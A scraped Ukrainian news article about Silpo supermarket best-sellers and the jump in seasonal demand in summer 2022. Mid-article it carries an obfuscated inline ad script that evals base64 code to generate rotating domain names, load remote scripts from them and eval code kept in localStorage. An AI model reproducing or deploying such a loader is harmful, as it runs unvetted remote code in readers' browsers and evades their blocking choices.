Завдяки аналітичним даним програми лояльності «Власний Рахунок» з’ясувалося, що цього року збільшився попит на свіжий урожай: ранні овочі, сезонні фрукти і ягоди. Традиційно фаворитами також залишаються яйця, банани, солодка та мінеральна вода.
«Ціна тижня»: в мережах Varus і Сільпо назвали акційні товари в Запоріжжі
П’ятірка найпопулярніших товарів у супермаркетах «Сільпо»:
БананиМінеральна вода «Моршинська»Напій Coca-ColaОгіркиЯйця
Якщо ж говорити про найпопулярніші категорії товарів, то ось вони:
Хліб.Солодка вода.Мінеральна вода.Булочки та здобні вироби.Морозиво.
На які товари найбільше зріс попит?Дані програми «Власний Рахунок» також показали, які категорії товарів користуються більшою популярністю порівняно з травнем. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
З початком літа зросла купівля
сонцезахисних засобів — у 50 разів кісточкових фруктів і ягід (черешень, вишень, абрикосів, персиків) — у 20 разів кавунів та динь — у 12 разівтоварів для консервації — у 6 разівзасобів від комарів — у 6 разівтоварів для саду та городу — у 4 рази
Ділимося ще цікавішими даними – незвично, але зріс попит на:
фотоальбоми та фоторамки — у 8 разівзасоби для манікюру та педикюру — у 4 разизасоби для догляду за волоссям і фарби — у 3 разиохолоджені напівфабрикати — у 15 разів
(adsbygoogle = window.adsbygoogle || []).push({});
Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/u-silpo-pokazali-najpopulyarnishi-tovari-vlitku-2022/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook